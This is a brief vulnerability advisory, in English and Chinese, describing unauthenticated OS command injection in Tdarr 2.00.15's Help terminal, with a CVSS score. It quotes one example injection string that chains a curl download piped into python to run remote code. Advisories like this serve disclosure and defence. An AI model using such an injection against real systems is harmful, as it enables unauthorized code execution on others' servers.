Tdarr 2.00.15 - Command Injection

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

OS命令中使用的特殊元素转义处理不恰当(OS命令注入)

Tdarr 操作系统命令注入漏洞

Tdarr是Tdarr公司的一个多媒体转码自动化平台。 Tdarr 2.00.15版本存在操作系统命令注入漏洞，该漏洞源于Help终端存在未经身份验证的远程代码执行，可能导致攻击者注入并链接任意命令。

N/A

N/A